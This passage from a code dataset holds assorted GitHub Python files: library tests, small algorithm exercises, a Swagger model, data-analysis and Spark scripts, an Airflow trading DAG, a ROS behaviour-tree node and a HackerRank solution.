== {'color': 'white', 'height': 1, 'non_field_attr': 'hey'}\n\n\ndef test_init_fields():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n @init_fields\n def __init__(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! 
height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # create an instance\n help(Wall.__init__)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2, 'non_field_attr': 'hello'}\n\n w = Wall(msg='hey', color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12, 'non_field_attr': 'hey'}\n\n\nno_type_checker = False\ntry:\n import typeguard\nexcept ImportError:\n try:\n import pytypes\n except ImportError:\n no_type_checker = True\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\n@pytest.mark.skipif(no_type_checker, reason=\"no type checker is installed\")\ndef test_autofields_readme():\n \"\"\"Test for readme on autofields\"\"\"\n\n from ._test_py36 import _test_autofields_readme\n Pocket, Item, Pocket2 = _test_autofields_readme()\n\n with pytest.raises(TypeError):\n Item()\n\n item1 = Item(name='1')\n pocket1 = Pocket(size=2)\n pocket2 = Pocket(size=2)\n\n # make sure that custom constructor is not overridden by @autofields\n pocket3 = Pocket2(\"world\")\n with pytest.raises(MandatoryFieldInitError):\n pocket3.size\n\n # make sure the items list is not the same in both (if we add the item to one, they do not appear in the 2d)\n assert pocket1.size == 2\n assert pocket1.items is not pocket2.items\n pocket1.items.append(item1)\n assert len(pocket2.items) == 0\n\n\ntry:\n import pytypes\nexcept ImportError:\n has_pytypes = False\nelse:\n has_pytypes = True\n\n\n@pytest.mark.skipif(has_pytypes, reason=\"pytypes does not correctly support vtypes - \"\n \"see https://github.com/Stewori/pytypes/issues/86\")\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\ndef test_autofields_vtypes_readme():\n\n from ._test_py36 import _test_autofields_vtypes_readme\n Rectangle = _test_autofields_vtypes_readme()\n\n r = Rectangle(1, 2)\n with pytest.raises(FieldTypeError):\n Rectangle(1, -2)\n with pytest.raises(FieldTypeError):\n Rectangle('1', 2)\n\n\ndef test_autoclass():\n \"\"\" Tests the example with autoclass in the doc \"\"\"\n @autoclass\n class Foo(object):\n msg = field(type_hint=str)\n age = field(default=12, type_hint=int)\n\n foo = Foo(msg='hello')\n\n assert [f.name for f in get_fields(Foo)] == ['msg', 'age']\n\n print(foo) # automatic string representation\n print(foo.to_dict()) # dict view\n\n assert str(foo) == \"Foo(msg='hello', age=12)\"\n assert str(foo.to_dict()) in (\"{'msg': 'hello', 'age': 12}\", \"{'age': 12, 'msg': 'hello'}\")\n assert foo == Foo(msg='hello', age=12) # comparison (equality)\n assert foo == {'msg': 'hello', 'age': 12} # comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_2():\n from ._test_py36 import _test_autoclass2\n Foo = _test_autoclass2()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert str(foo.to_dict()) # automatic dict view\n\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n assert foo == {'msg': 'hello', 'age': 12, 'height': 50} # automatic eq comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_3():\n 
from ._test_py36 import _test_autoclass3\n Foo = _test_autoclass3()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n with pytest.raises(AttributeError):\n foo.to_dict() # method does not exist\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n\n # type checking ON\n with pytest.raises(FieldTypeError):\n foo.msg = 1\n","repo_name":"smarie/python-pyfields","sub_path":"pyfields/tests/test_readme.py","file_name":"test_readme.py","file_ext":"py","file_size_in_byte":16554,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"}
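One detail worth calling out from the pyfields tests above: test_default_factory contrasts a shared mutable default with a per-instance factory. A condensed restatement of just that pitfall, assuming pyfields is installed:

from pyfields import field

class BadPocket(object):
    items = field(default=[])                       # the same list object is shared by every instance

class Pocket(object):
    items = field(default_factory=lambda obj: [])   # a fresh list is built per instance

p, q = BadPocket(), BadPocket()
p.items.append('thing')
assert q.items == ['thing']   # the mutation leaks into the other instance

p, q = Pocket(), Pocket()
p.items.append('thing')
assert q.items == []          # isolated, as the test expects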
+{"seq_id":"21352462697","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nvocab = [\"mobile\",\"samsung\",\"sam\",\"sung\",\n \"man\",\"mango\",\"icecream\",\"and\",\n \"go\",\"i\",\"like\",\"ice\",\"cream\"]\n\ndef f(inp):\n n = len(inp)\n if n == 0:\n return True\n for i in range(n+1):\n if inp[0:i] in vocab and f(inp[i:]):\n return True\n return False\n \n \ninp = 'ilikesamsungandicecream'\nprint(f(inp))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"dp/Word_Break/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"}
+{"seq_id":"20871611792","text":"import unittest\nfrom numpy import cos, log, pi as PI, sin\n\nfrom numeric.e2.rotation import Rotation\n\n\nclass BasicTestSuite(unittest.TestCase):\n\n def f(self, x):\n return sin(x)\n\n interval = [PI, 7 * PI]\n angle = PI / 8\n x = 3\n\n def test_rotated_interval(self):\n\n rotation = Rotation(self.f, self.interval, self.angle)\n interval_rotated = rotation.get_interval_after_rotation()\n left_expected = self.interval[0] * cos(self.angle) - self.f(self.interval[0]) * sin(self.angle)\n right_expected = self.interval[1] * cos(self.angle) - self.f(self.interval[1]) * sin(self.angle)\n self.assertAlmostEqual(left_expected, interval_rotated[0])\n self.assertAlmostEqual(right_expected, interval_rotated[1])\n\n def test_point_before_rotation(self):\n expected_point_before_rotation = [self.x, self.f(self.x)]\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_before_rotation = rotation.get_point_before_rotation()\n\n self.assertAlmostEqual(expected_point_before_rotation[0], actual_point_before_rotation[0])\n self.assertAlmostEqual(expected_point_before_rotation[1], actual_point_before_rotation[1])\n\n def test_point_after_rotation(self):\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_after_rotation = rotation.get_point_after_rotation()\n\n self.assertAlmostEqual(expected_point_after_rotation[0], actual_point_after_rotation[0])\n self.assertAlmostEqual(expected_point_after_rotation[1], actual_point_after_rotation[1])\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"macksimiljan/num3ric","sub_path":"tests/e2/test_rotation.py","file_name":"test_rotation.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1104211349","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.network_identifier import NetworkIdentifier # noqa: F401,E501\nfrom swagger_server.models.partial_block_identifier import PartialBlockIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass BlockRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, network_identifier: NetworkIdentifier=None, block_identifier: PartialBlockIdentifier=None): # noqa: E501\n \"\"\"BlockRequest - a model defined in Swagger\n\n :param network_identifier: The network_identifier of this BlockRequest. # noqa: E501\n :type network_identifier: NetworkIdentifier\n :param block_identifier: The block_identifier of this BlockRequest. # noqa: E501\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n self.swagger_types = {\n 'network_identifier': NetworkIdentifier,\n 'block_identifier': PartialBlockIdentifier\n }\n\n self.attribute_map = {\n 'network_identifier': 'network_identifier',\n 'block_identifier': 'block_identifier'\n }\n self._network_identifier = network_identifier\n self._block_identifier = block_identifier\n\n @classmethod\n def from_dict(cls, dikt) -> 'BlockRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The BlockRequest of this BlockRequest. # noqa: E501\n :rtype: BlockRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def network_identifier(self) -> NetworkIdentifier:\n \"\"\"Gets the network_identifier of this BlockRequest.\n\n\n :return: The network_identifier of this BlockRequest.\n :rtype: NetworkIdentifier\n \"\"\"\n return self._network_identifier\n\n @network_identifier.setter\n def network_identifier(self, network_identifier: NetworkIdentifier):\n \"\"\"Sets the network_identifier of this BlockRequest.\n\n\n :param network_identifier: The network_identifier of this BlockRequest.\n :type network_identifier: NetworkIdentifier\n \"\"\"\n if network_identifier is None:\n raise ValueError(\"Invalid value for `network_identifier`, must not be `None`\") # noqa: E501\n\n self._network_identifier = network_identifier\n\n @property\n def block_identifier(self) -> PartialBlockIdentifier:\n \"\"\"Gets the block_identifier of this BlockRequest.\n\n\n :return: The block_identifier of this BlockRequest.\n :rtype: PartialBlockIdentifier\n \"\"\"\n return self._block_identifier\n\n @block_identifier.setter\n def block_identifier(self, block_identifier: PartialBlockIdentifier):\n \"\"\"Sets the block_identifier of this BlockRequest.\n\n\n :param block_identifier: The block_identifier of this BlockRequest.\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n if block_identifier is None:\n raise ValueError(\"Invalid value for `block_identifier`, must not be `None`\") # noqa: E501\n\n self._block_identifier = block_identifier\n","repo_name":"xanimo/rosetta-api","sub_path":"server/python-flask-server-generated/swagger_server/models/block_request.py","file_name":"block_request.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26922470953","text":"def count_ways(n):\n if n<=1:\n return 1\n d=[0]*(n+1)\n d[1]=1\n for i in range(2,n+1):\n d[i]+=d[i-1]\n d[i]+=d[i-3]\n if i%2==0:\n d[i]+=d[i//2]\n return d[n]\nn = int(input(('Введите значение n: ')))\nresult = count_ways(n)\nprint(f'Кол-во способов достичь {n} из точки 1: {result}')\n","repo_name":"setusq/PraktikaG34N6","sub_path":"pz6/dynamic_prog.py","file_name":"dynamic_prog.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24983233708","text":"import mne\nfrom mne.report import Report\nimport basic.process as process\nimport eelbrain as E\nimport os\nfrom mayavi import mlab\nmlab.options.offscreen = True\n\ne = process.NMG(None, '{home}')\nraw = 'calm_fft_hp1_lp40'\ne.set(raw = raw)\ne.set(analysis='data_quality')\n# report = Report()\n\nfor subject in subjects:\n# for _ in e:\n e.set(subject=subject)\n ds = e.load_events()\n ds = ds[ds['target'] == 'prime']\n ds = e.make_epochs(ds, tmin=-.2, tmax=.6, reject={'mag': 3e-12}, baseline=(None, 0))\n # covariance\n if 'epochs' in ds:\n ds = ds.aggregate('target', drop_bad=True)\n cov = e.get('cov', raw = raw + '_auto')\n if os.path.exists(cov):\n cov = mne.read_cov(e.get('cov', raw=raw + '_auto') )\n picks = mne.pick_types(ds['epochs'][0].info)\n evoked_white = mne.cov.whiten_evoked(ds['epochs'][0], cov, picks, diag=True)\n p = evoked_white.plot(picks=picks, unit=False, hline=[-2, 2], show=False)\n report.add_figs_to_section(p, [e.subject + '_cov'], 'Covariance')\n # coregistration\n p = mne.viz.plot_trans(ds.info['raw'].info, trans_fname=e.get('trans'),\n subject=e.subject, subjects_dir=e.get('mri_dir'),\n ch_type='meg', source='head')\n report.add_figs_to_section(p, [e.subject + '_coreg'], 'Coregistration')\n # bem\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'coronal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_coronal'], 'Bem Coronal')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'axial', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_axial'], 'Bem Axial')\n p = mne.viz.plot_bem(e.subject, e.get('mri_dir'), 'sagittal', show=False)\n report.add_figs_to_section(p, [e.subject + '_bem_tranverse'], 'Bem Sagittal')\n \n\nreport.save(e.get('report-file'), open_browser=False)","repo_name":"teonbrooks/NMG-project","sub_path":"exp_scripts/3_mne_report.py","file_name":"3_mne_report.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36028005217","text":"import warnings\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn.externals import joblib\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.linear_model.coordinate_descent import ConvergenceWarning\nfrom sklearn.model_selection import train_test_split # 数据划分的类\nfrom sklearn.preprocessing import StandardScaler # 数据标准化\n\n# 设置字符集,防止中文乱码\nmpl.rcParams['font.sans-serif'] = [u'simHei']\nmpl.rcParams['axes.unicode_minus'] = False\n# 拦截异常\nwarnings.filterwarnings(action='ignore', category=ConvergenceWarning)\n\npath = \"datas/breast-cancer-wisconsin.data\"\nnames = ['id', 'Clump Thickness', 'Uniformity of Cell Size', 'Uniformity of Cell Shape',\n 'Marginal Adhesion', 'Single Epithelial Cell Size', 'Bare Nuclei', 'Bland Chromatin', 'Normal Nucleoli',\n 'Mitoses', 'Class']\n\ndf = pd.read_csv(path, header=None, names=names)\n\ndata = df.replace('?', np.nan).dropna(how='any') # 只要有列为空,就进行删除操作\n\nprint(data.head(5))\n\n# 1.数据提取以及数据分割\n# 提取\nX = data[names[1:10]]\nY = data[names[10]]\n\n# 分割\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n# 2.数据格式化(归一化)\nss = StandardScaler()\nX_train = ss.fit_transform(X_train) # 训练模型及归一化数据\n\n# 3.模型构建及训练\n\nlr = LogisticRegressionCV(multi_class='ovr', fit_intercept=True, Cs=np.logspace(-2, 2, 20), cv=2, penalty='l2',\n solver='lbfgs', tol=0.01)\nre = lr.fit(X_train, Y_train)\n\nr = re.score(X_train, Y_train)\n\n# 4.模型效果获取\nprint(\"R值(准确率):\", r)\nprint(\"稀疏化特征比率:%.2f%%\" % (np.mean(lr.coef_.ravel() == 0) * 100))\nprint(\"参数:\", re.coef_)\nprint(\"截距:\", re.intercept_)\nprint(re.predict_proba(X_test)) # 获取sigmoid函数返回的概率值\n\n# 5.模型相关信息保存\njoblib.dump(lr, \"result/ss.model\")\n\noss = joblib.load(\"result/ss.model\")\n\n# # 数据预测\n# a.预测数据格式化(归一化)\nX_test = ss.transform(X_test) # 使用模型进行归一化操作\n\n# b.结果数据预测\nY_predict = oss.predict(X_test)\n\n# 图标展示\nx_len = range(len(X_test))\nplt.figure(figsize=(14, 7), facecolor='w')\nplt.ylim(0, 6)\nplt.plot(x_len, Y_test, 'ro', markersize=8, zorder=3, label=u'真实值')\nplt.plot(x_len, Y_predict, 'go', markersize=15, zorder=2, label=u'预测值,$R^2$=%.3f' % re.score(X_test, Y_test))\nplt.legend(loc='upper left')\nplt.xlabel(u'数据编号', fontsize=18)\nplt.xlabel(u'乳腺癌类型', fontsize=18)\nplt.title(u'Logistic回归算法对数据进行分类', fontsize=20)\nplt.show()\n","repo_name":"myDemoMike/MachineLearning","sub_path":"003LinearRegression/逻辑回归:乳腺癌分类.py","file_name":"逻辑回归:乳腺癌分类.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30910866638","text":"def part1(nums):\n jolt_1 = 0\n jolt_3 = 0\n base = 0\n for i in range(len(nums)):\n jolt = min([x for x in nums if base < x <= (base + 3)])\n if (jolt - base) == 1:\n jolt_1 += 1\n if (jolt - base) == 3:\n jolt_3 += 1\n base = jolt\n\n return jolt_1 * (jolt_3 + 1)\n\n\ndef dist_ways_ways(nums, base, index, inf):\n if base == max(nums):\n return 1\n\n key = base * 10000 + index\n if key in inf:\n return inf[key]\n\n w = 0\n ad = [x for x in nums if base < x <= (base + 3)]\n for a in ad:\n if a in nums:\n w = w + dist_ways_ways(nums, a, index + 1, inf)\n\n inf[key] = w\n return w\n\n\ndef part2(nums):\n inf = {}\n return dist_ways_ways(nums, 0, 0, inf)\n\n\nif __name__ == '__main__':\n with open('10.txt') as _file:\n lines = [int(line) for line in _file.read().splitlines()]\n nums = [int(x) for x in lines]\n\n print(\"Part 1 answer: \", part1(nums))\n print(\"Part 2 answer: \", part2(nums))\n","repo_name":"Cipulot/AdventOfCode","sub_path":"2020/day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6158059679","text":"# Programa com função ficha() que recebe dois parâmetros opcionais: nome do jogador e quantos gols ele marcou\n# Programa deve mostrar a ficha do jogador, mesmo que algum dado não tenha sido informado corretamente\ndef ficha(jogador='', gols=0):\n print(f'O jogador {jogador} fez {gols} gols(s).')\n\n\nnome = str(input('Digite o nome do jogador: '))\ngols = str(input(f'Quantos gols {nome} fez?'))\nif gols.isnumeric():\n gols = int(gols)\nelse:\n g = 0\nif nome.strip() == '':\n ficha(gols=gols)\nelse:\n ficha(nome, gols)","repo_name":"gabcarvalhaes/curso-em-video","sub_path":"python-mundo-3/exercicios/ex103.py","file_name":"ex103.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73577172969","text":"from pyspark.sql import SparkSession, Window\nfrom pyspark import find_spark_home, HiveContext\nfrom pyspark.sql.functions import year, col, lit, row_number, desc, dense_rank, to_timestamp\n\nfrom SparkSessionBase import SparkSessionBase\n\nclass RecommendByRecentReview(SparkSessionBase):\n SPARK_URL = \"local\"\n SPARK_APP_NAME = 'TextRandJob'\n ENABLE_HIVE_SUPPORT = True\n\n def __init__(self):\n self.spark = self._create_spark_session()\n\n def start(self):\n hc=HiveContext(self.spark.sparkContext)\n re_df=hc.table('review').limit(50000)\n w1=Window.partitionBy('rev_user_id').orderBy(col('rev_date').desc())\n result=re_df.select('rev_user_id','review_id','rev_business_id','rev_date',dense_rank().over(w1))\n result.show()\n# XXX 大数据分析代码\n\nif __name__ == '__main__':\n RecommendByRecentReview().start()","repo_name":"KYJ2021/bigdata","sub_path":"RecommendByRecentReview.py","file_name":"RecommendByRecentReview.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"36843930595","text":"from time import sleep\n\n\ndef change_direction(current_direction):\n if current_direction == 0:\n return 3\n else:\n return current_direction - 1\n\n\ndef back_direction(current_direction):\n if current_direction == 0:\n return 2\n elif current_direction == 1:\n return 3\n else:\n return current_direction - 2\n\n\ndef set_next(a, b, direction):\n if direction == 3:\n a = a + dy[1]\n b = b + dx[1]\n elif direction == 2:\n a = a + dy[2]\n b = b + dx[2]\n elif direction == 1:\n a = a + dy[0]\n b = b + dx[0]\n else:\n a = a + dy[3]\n b = b + dx[3]\n\n return a, b\n\n\n# 동 서 남 북\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\ncount = 0\nnext_a = 0\nnext_b = 0\n\nn, m = map(int, input().split())\na, b, direction = map(int, input().split())\n\nboard = []\nis_visited = [[0] * m for _ in range(n)] # 0 :아직 안들림 1 : 들림\n\n\nfor i in range(n):\n board.append(list(map(int, input().split())))\n\nis_visited[b][a] = 1\ncount = count + 1\n\nwhile True:\n is_move = False\n for i in range(4):\n direction = change_direction(direction)\n next_a, next_b = set_next(a, b, direction)\n # 바다 거나, 들렸던 칸이면\n if board[next_b][next_a] == 1 or is_visited[next_b][next_a] == 1:\n print(\"바다거나, 들렸던 칸임: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n continue\n else:\n print(\"방문: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n count = count + 1\n a = next_a\n b = next_b\n is_visited[next_b][next_a] = 1\n is_move = True\n break\n next_a, next_b = set_next(a, b, back_direction(direction))\n if board[next_b][next_a] == 1:\n break\n elif is_move == False:\n a = next_a\n b = next_b\n print(\"뒤로가기: [%d, %d]\" % (next_b, next_a))\n sleep(1)\n\n\nprint(count)\n# 1. 방향 바꾸기\n","repo_name":"2yunseong/Algorithm","sub_path":"ndb/implementation/example4_4.py","file_name":"example4_4.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24231887165","text":"\"\"\"\n有一分数序列:2/1,3/2,5/3,8/5,13/8,21/13...求出这个数列的前20项之和。\n思路:\n引入reduce 进行相加\n规律 前一个的分子是第二个的分母 前一个分子分母相加等于第二个分子\n\"\"\"\nfrom functools import reduce\nl=[]\nm=2\nn=1\nl.append(m/n)\nfor i in range(1,20):\n n,m=m,m+n\n l.append(m/n)\n\nsum = reduce(lambda x,y:x+y,l)\nprint(sum)","repo_name":"liucheng2912/py","sub_path":"100例/24.py","file_name":"24.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"6676979504","text":"from airflow import DAG\nfrom airflow.operators.python import PythonOperator\nfrom airflow.utils.dates import days_ago\nfrom utils import strategy\nfrom datetime import timedelta\nimport os\n\nDAG_ID = os.path.basename(__file__).replace('.pyc', '').replace('.py', '')\nCONN_ID = 'postgres_stocks'\n\nSMA = 30\nDEV = 2\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': days_ago(1),\n 'retries': 2,\n 'retry_delay': timedelta(minutes=5),\n 'email_on_failure': False,\n 'email_on_retry': False,\n}\n\nwith DAG(\n dag_id=DAG_ID,\n default_args=default_args,\n schedule_interval='10 1 * * *',\n) as dag:\n\n bollinger_bands_aapl = PythonOperator(\n task_id='bollinger_bands_aapl',\n python_callable=strategy.apply_strategy,\n op_kwargs={\n 'connector': CONN_ID,\n 'source_table_name': 'aapl',\n 'ticker': 'AAPL',\n 'strategy_func': strategy.bollinger_bands_strategy,\n 'op_kwargs': {\n 'sma': SMA,\n 'dev': DEV,\n }\n }\n )\n\n","repo_name":"airflow-courses/udemy_algo_trading_airflow","sub_path":"airflow/dags/strategy/bollinger_bands_strategy.py","file_name":"bollinger_bands_strategy.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"}
+{"seq_id":"20509276815","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.github.com/stonier/py_trees_ros/license/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nThis node captures the rtreachabiliy decision result over safety\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport py_trees\nimport rospy\nimport sensor_msgs.msg as sensor_msgs\nfrom std_msgs.msg import Float32\nfrom py_trees_ros import subscribers\n############<>##############################\nimport numpy as np\nimport math\nfrom collections import deque\n############<>################################\n\n##############################################################################\n# Blackboard node\n##############################################################################\n\n\nclass ToBlackboard(subscribers.ToBlackboard):\n \"\"\"\n Subscribes to the battery message and writes battery data to the blackboard.\n Also adds a warning flag to the blackboard if the battery\n is low - note that it does some buffering against ping-pong problems so the warning\n doesn't trigger on/off rapidly when close to the threshold.\n\n When ticking, updates with :attr:`~py_trees.common.Status.RUNNING` if it got no data,\n :attr:`~py_trees.common.Status.SUCCESS` otherwise.\n\n Blackboard Variables:\n * rtreach_result: the raw message from topic /reachability_result\n * emergency_stop_warning (:obj:`bool`)\n * rtreach_warning (:obj:`bool`)\n * rtreach_long_term_warning (:obj:`bool`)\n Args:\n name (:obj:`str`): name of the behaviour\n topic_name (:obj:`str`) : name of the input topic \n enable_emergency_stop (:obj:`float`) : parameter \n rtreach_window_size (:obj:`float`) : parameter \n rtreach_window_threshold (:obj:`float`) : parameter \n \"\"\"\n def __init__(self, \n name, \n topic_name=\"rtreach_result\", \n enable_emergency_stop=True, \n rtreach_window_size=25, \n rtreach_window_threshold=0.75 \n ):\n \n super(ToBlackboard, self).__init__(name=name,\n topic_name=topic_name,\n topic_type=Float32,\n blackboard_variables={\"rtreach_result\":None},\n clearing_policy=py_trees.common.ClearingPolicy.NEVER\n )\n self.blackboard = py_trees.blackboard.Blackboard()\n \n self.blackboard.rtreach_result = Float32()\n \n self.blackboard.emergency_stop_warning = False\n self.blackboard.rtreach_warning = False\n self.blackboard.rtreach_long_term_warning = False\n \n self.enable_emergency_stop=enable_emergency_stop \n self.rtreach_window_size=rtreach_window_size \n self.rtreach_window_threshold=rtreach_window_threshold \n############<>##############################\n self.rtreach_window = deque(maxlen=rtreach_window_size)\n self.rtreach_long_term_pub = rospy.Publisher( '/uuv0/rtreach_long_term',\n Float32,\n queue_size=1) \n############<>################################\n def update(self):\n \"\"\"\n Call the parent to write the raw data to the blackboard and then check against the\n parameters to update the bb variable\n \"\"\"\n self.logger.debug(\"%s.update()\" % self.__class__.__name__)\n status = super(ToBlackboard, self).update()\n if status == py_trees.common.Status.RUNNING:\n return status\n############<>##############################\n # Old way, using binary rtreach output\n # if self.blackboard.rtreach_result.data < 1.0 and 
self.enable_emergency_stop:\n # self.blackboard.emergency_stop_warning = True\n # rospy.logwarn_throttle(1, \"%s: emergency_stop_warning!\" % self.name)\n \n # long term rtreach\n if rospy.Time.now() > rospy.Time(5): \n val = (max(\n max(\n min(math.exp(self.blackboard.rtreach_index.data) / 4.0, 0.5)\n ,0),\n self.blackboard.rtreach_result.data)\n )\n self.rtreach_window.append(val)\n # 1: safe, 0: unsafe\n if (np.mean(self.rtreach_window) < self.rtreach_window_threshold) and len(self.rtreach_window) == self.rtreach_window_size:\n self.blackboard.rtreach_long_term_warning = True\n rospy.logwarn(\"%s: **** rtreach_long_term_warning (%0.2f)\" % (self.name, val))\n else:\n self.blackboard.rtreach_long_term_warning = False\n\n if self.blackboard.rtreach_result.data < 1.0:\n self.blackboard.rtreach_warning = True\n rospy.logwarn(\"%s: rtreach_warning\" % self.name)\n else:\n self.blackboard.rtreach_warning = False\n self.rtreach_long_term_pub.publish(Float32(np.mean(self.rtreach_window)))\n\n\n############<>################################\n return status\n \n############<>##############################\n############<>################################","repo_name":"AbLECPS/alc","sub_path":"bluerov2_standalone/catkin_ws/src/vandy_bluerov/behaviour_tree_gen/bb_rtreach2bb.py","file_name":"bb_rtreach2bb.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"32239549105","text":"#\n# Rank: MEDIUM\n# Score: 25/25\n# HackerRank Link: https://www.hackerrank.com/challenges/the-time-in-words/problem\n#\n\n# (5, 00, \"five o' clock\"), /\n# (5, 01, \"one minute past five\"),\n# (5, 10, \"ten minutes past five\"),\n# (5, 15, \"quarter past five\"),\n# (5, 28, \"twenty eight minutes past five\"),\n# (5, 30, \"half past five\"),\n# (5, 40, \"twenty minutes to six\"),\n# (5, 45, \"quarter to six\"),\n# (5, 47, \"thirteen minutes to six\")\n\n\nimport math\n\n\ndef the_time_in_words(h, m):\n if m == 0:\n return '{:s}{:s}'.format(number_mapping(h), time_mapping(0))\n\n if m <= 30: # past\n conj = 1\n hour = h\n else: # to\n conj = 2\n hour = (h+1) % 12\n m = 60 - m\n\n minute = number_mapping(m)\n if not minute:\n tens = tens_mapping(int(math.floor(m / 10)))\n units = number_mapping(m % 10)\n\n if not tens:\n minute = units + 'teen'\n elif not units:\n minute = tens\n else:\n minute = '{:s} {:s}'.format(tens, units)\n\n minute = minute_mapping(minute, m)\n\n return '{:s}{:s}{:s}'.format(minute,\n time_mapping(conj),\n number_mapping(hour))\n\n\ndef tens_mapping(t):\n return{\n 2: 'twenty'\n }.get(t, None)\n\n\ndef number_mapping(n):\n return{\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 15: 'quarter',\n 30: 'half'\n }.get(n, '')\n\n\ndef time_mapping(t):\n return{\n 0: ' o\\' clock',\n 1: ' past ',\n 2: ' to '\n }.get(t, '')\n\n\ndef minute_mapping(minute, m):\n if m == 15 or m == 30:\n return minute\n return{\n True: '{:s} minutes'.format(minute),\n False: '{:s} minute'.format(minute)\n }.get(m > 1, 